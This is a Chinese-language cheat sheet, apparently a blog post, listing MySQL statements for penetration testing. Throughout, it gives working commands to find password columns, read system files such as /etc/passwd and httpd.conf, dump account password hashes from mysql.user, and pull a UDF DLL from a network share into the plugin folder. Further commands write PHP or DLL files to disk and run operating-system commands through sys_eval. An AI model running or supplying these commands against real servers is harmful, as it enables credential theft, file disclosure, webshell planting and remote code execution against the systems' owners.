# 找到含有密码字段的表
select table_name,column_name from INFORMATION_SCHEMA.COLUMNS where column_name like '%pwd%' or column_name like '%passw%'
#找含有特定内容的表名
SELECT table_name FROM information_schema.tables where table_schema='dbname' and table_name like '%use%';
# MySQL 5.0.67开始,UDF库必须包含在plugin文件夹中,如果为空就不受限制
select @@plugin_dir
select @@version
select @@datadir
select @@tmpdir
#读取文件
select load_file('/etc/passwd')
select length(load_file('/var/www/html/index.php'))
后面附比较重要的文件
#有的注入方式读取很慢,可以只读一部分
select INSTR(load_file('/etc/httpd/conf/httpd.conf'),'xxx.com')
#读取第3个'DocumentRoot后面的内容
select substring(substring_index(substring_index(load_file('/etc/httpd/conf/httpd.conf'),'DocumentRoot',3),'DocumentRoot',-1),1,20):
#获取mysql的账号口令hash
SELECT host,user,password,Grant_priv,Super_priv FROM mysql.user
#正在执行的操作 相当于show processlist
SELECT * FROM INFORMATION_SCHEMA.PROCESSLIST
#mysql写文件
select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";
select 0x4d5a900003000xxxxx into dumpfile 'xxx.dll'
select 'xxxx' into file 'xx.php'
#mysql udf
create function sys_eval returns string soname 'udf.dll'; // 安装udf
select * from mysql.func where name = 'sys_eval'; // 验证
drop function sys_eval;
select sys_eval('dir');
/etc/issue 系统版本
/etc/sysconfig/network-scripts/ifcfg-eth0 可能有ip
/etc/passwd 密码hash
/etc/sysconfig/iptables 防火墙规则
/etc/httpd/conf/httpd.conf http配置
/etc/crontab 计划任务
渗透中用到的sql语句-mysql篇
最新推荐文章于 2023-03-17 15:17:05 发布